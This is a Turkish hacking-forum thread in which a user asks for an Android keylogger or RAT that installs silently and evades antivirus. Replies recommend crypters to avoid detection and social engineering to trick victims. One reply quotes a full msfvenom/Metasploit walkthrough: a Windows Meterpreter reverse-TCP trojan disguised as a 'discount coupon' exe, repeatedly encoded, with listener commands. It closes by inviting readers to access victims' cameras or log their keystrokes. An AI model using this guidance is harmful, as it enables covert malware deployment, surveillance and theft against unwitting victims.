Antivirüse Yakalanmayan Hazır Virüs Oluşturabilir miyim?

Axuila

Axuila

Üye
26 Kas 2020
117
19
arkadaşlar bana direkt kurulan keylogger lazım böyle bir şey var mı?, çünkü çoğu virüsleri android cihaza kurarken 3. yazılım uygulaması diye izin istiyor sonra "bu uygulama tehlikeli yinede yüklensin mi" diyor falan filan bu soruları sormayan direkt play store'dan indirilmiş gibi şipşak kurabileceğim virüs (keylogger, rat, v.s) var mı ?

kısaca : direkt virüsü indirirken sanki play store'dan indirmiş gibi hemen kursun istiyorum
 
Tarihe göre sırala Oylara göre sırala
Lihtg

Lihtg

Kıdemli Üye
15 Mar 2022
2,062
898
lihtgTHT.php
Merhabalar, virüslerin nerdeyse hepsi bu uyarılara takılır hele hele hazır olarak oluşturdukların. Bunlara yakalanmamak için virüsünü şifrelemen lazım. Forumumuzun undetected bölümünde işine yarayacak konular var. Hazır oluşturucular yıllardır kullanılıyor, onlardan çıkan virüsleri artık hemen hemen tüm antivirüsler tanıyor ve senin sisteminin de uyarı vermesi normal. Kendin bile yazsan yüksek ihtimal bahsettiğin uyarıyı alacaksın. Virüsünü şifrelersen antivirüs programlarının zararlı yazılımı tespiti zorlaşır ve o uyarıları da almazsın. Esenlikler.

Undetected

Crypter, HEX kodlama ile ilgili konular
www.turkhackteam.org www.turkhackteam.org
 
Oyla 0 Downvote
kst132

kst132

Basın&Medya Ekibi Asistanı
12 Haz 2023
971
613
Axuila' Alıntı:
arkadaşlar bana direkt kurulan keylogger lazım böyle bir şey var mı?, çünkü çoğu virüsleri android cihaza kurarken 3. yazılım uygulaması diye izin istiyor sonra "bu uygulama tehlikeli yinede yüklensin mi" diyor falan filan bu soruları sormayan direkt play store'dan indirilmiş gibi şipşak kurabileceğim virüs (keylogger, rat, v.s) var mı ?

kısaca : direkt virüsü indirirken sanki play store'dan indirmiş gibi hemen kursun istiyorum
Genişletmek için tıkla ...
Merhaba,
Lihtg'ın da dediği gibi bu zararlı yazılımların çoğu antivirüsten geçemeyebiliyor. Size önerim Keylogger'ı kendiniz programlayın.
 
Oyla 0 Downvote
BlackDynamite

BlackDynamite

Katılımcı Üye
7 Kas 2023
982
379
Axuila' Alıntı:
arkadaşlar bana direkt kurulan keylogger lazım böyle bir şey var mı?, çünkü çoğu virüsleri android cihaza kurarken 3. yazılım uygulaması diye izin istiyor sonra "bu uygulama tehlikeli yinede yüklensin mi" diyor falan filan bu soruları sormayan direkt play store'dan indirilmiş gibi şipşak kurabileceğim virüs (keylogger, rat, v.s) var mı ?

kısaca : direkt virüsü indirirken sanki play store'dan indirmiş gibi hemen kursun istiyorum
Genişletmek için tıkla ...
Önce Uygulama Apk Olarak Kurulur 3. Taraf sorması diyorki sen 3 . parti uygulama yüklüyorsun diyor bunu normal temiz uygulamada yapıyor yani söyleyceğim android antivirüs geçmek daha basit önemli olan play protect geçmen bide bu sene itibari ile OpSec ler Android Virüslerden Dolayı 14 13 Güncelleme getirip erisebilirliğe kısıtlama getirdi
 
Oyla 0 Downvote
Rapx13

Rapx13

Üye
1 Kas 2023
103
27
Atamın İzinde
BlackDynamite' Alıntı:
Önce Uygulama Apk Olarak Kurulur 3. Taraf sorması diyorki sen 3 . parti uygulama yüklüyorsun diyor bunu normal temiz uygulamada yapıyor yani söyleyceğim android antivirüs geçmek daha basit önemli olan play protect geçmen bide bu sene itibari ile OpSec ler Android Virüslerden Dolayı 14 13 Güncelleme getirip erisebilirliğe kısıtlama
TrBraveHeart' Alıntı:
Merhaba değerli "Türk Hack Team" ailesi bu yazımda sizlere ****sploit ten trojan oluşturmayı anlatacağım öncelikle githubtan ****sploiti uç birim sayesinde kurmalısınız sonrasında Port açmak lazım port açmakta biraz sıkıntı vardır ondan dolayı duck dns sayesinde port olayını çözmeliyiz

PORT:Kanal demektir port ile pc ile virüs arasındaki bağlantıdır port olmazsa bağlantı olmaz yaptığınız trojan sadece hedef pc de kalır.


Aşağıda verdiğim harfler ve anlamları önemlidir dikkatlice okuyunuz!

f = Kaydedilecek dosya formatı. msfvenom -f çıktı formatı

-a = Oluşturulacak payloadun mimarisini belirler. Msfvenom -a mimari

--platform = Dosyanın çalışacağı platformu belirler. msfvenom --platform çalışacağı platform"

-o = Payloadun nereye çıkarılacağını belirtir. msfvenom -o çıkarılacak dizi"

-e = Encoder seçimini belirtir. msfvenom -e encoder adı

-i = İterasyon sayısını belirler yani encoding işleminin kaç kere tekrarlanacağını bildirir. "msfvenom -i 20"

-b = Kötü karakterleri (bad characters) temizler. msfvenom -b \x00\xff

-x = Oluşturulacak payloadun bir dosya ile birleştirileceğini belirtir. msfvenom -x birleştirilecek dosyanın adı veya yolu

-k = Birleştirilen dosyanın fonksiyonlarının bozulmasını engelle msfvenom -k

-c = Birleştirilecek Shell codeu belirler. msfvenom -c Shell code dizini

Şimdi eğer parametreleri öğrendiysek gelelim trojan oluşturmaya.



1-Konsolu açıyoruz.

2-Konsola msfvenom ile msfvenom parametrelerini kullanarak bir trojan oluşturuyoruz.Ben şimdilik şöyle bir trojan oluşturacağız.

###YAZILAN İP, PORT TEMSİLİDİR SİZ KENDİ BİLGİLERİNİZİ GİRECEKSİNİZ.###

##ÖRNEK##msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=443 -f exe -a x86 -o /root/Masaüstü/indirimkuponu.exe --platform windows -e x86/shikata_ga_nai -i 20--

&&Bu demek oluyorki dosyamızı msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=443 -f exe -a x86 -o /root/Masaüstü/indirimkuponu.exe --platform windows -e x86/shikata_ga_nai -i 20 komutu ile oluşturduk. Buna göre 192.168.1.6 IP adresinin 443 portuna geri dönüş yapacak, x86 platformda çalışacak, shikata_ga_nai encoderını kullanan, 20 defa encoding işlemi yapan bir exe dosyası hazırlamış olduk. Yani 20 defa üst üste şifreledik.
Trojanı oluşturduk sıra geldi dinlemeye



Başka bir konsol açıp msfconsole komutunu yazarak ****sploit konsolunu çalıştırıyoruz. Ardından listen moda geçmek için aşağıdaki tabloda yer alan komutları sırası ile yazacağız.Komutları öğrenelim ilk önce

use exploit/multi/handler = Gelen bağlantıları dinleyecek handlerımızı belirtiyoruz.


set PAYLOAD windows/meterpreter/reverse_tcp = Bize ters bağlantı (reverse connection) kuracak olan payloadumuzu ayarlıyoruz.



set LHOST 192.168.126.141 = Gelen bağlantıları kabul edecek IP adresimizi belirtiyoruz.



set LPORT 443 = 443üncü porta gelen bağlantıları dinleyeceğimizi ve bu bağlantıları kabul edeceğimizi belirtiyoruz.

Herşey olduktan sonra run komutu ile başlatıyoruz şimdi dinlemeye aldık dinlemede iken eğer birisi trojanı açarsa port sayesinde ekranımıza ipi si düşecektir gelen daveti kabul etmek için session komutunu kullanıyoruz bu sayede kabul etmiş oluyoruz bundan sonrası size kalmış ister gidin kamerasına girin ister klavye takibi yapın sizin tercihiniz

####ÖNEMLİ UYARI####

Yaptığınız faaliyetlerden başta Türk Hack Team yönetimi olmak üzere Şahsım dahil kimse sorumlu değildir.

##EĞER TAKILDIĞINIZ NOKTA OLURSA SORABİLİRSİNİZ##
Genişletmek için tıkla ...
Bu konu işinize yarayabilir. İyi forumlar.
Genişletmek için tıkla ...
 
Oyla 0 Downvote
S0N4K

S0N4K

Uzman üye
24 Haz 2016
1,267
180
root
Virüsten ziyade apk kurulum yaptığınız her uygulamaya bu sorular soruluyor. Virüsü kendiniz kodlasa da bunu her türlü soracaktır onun yerine kurbana daha gerçekçi bir senaryo sunup güvenini kazanıp direkt kurmasını sağlayabilirsiniz.
 
Oyla 0 Downvote
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.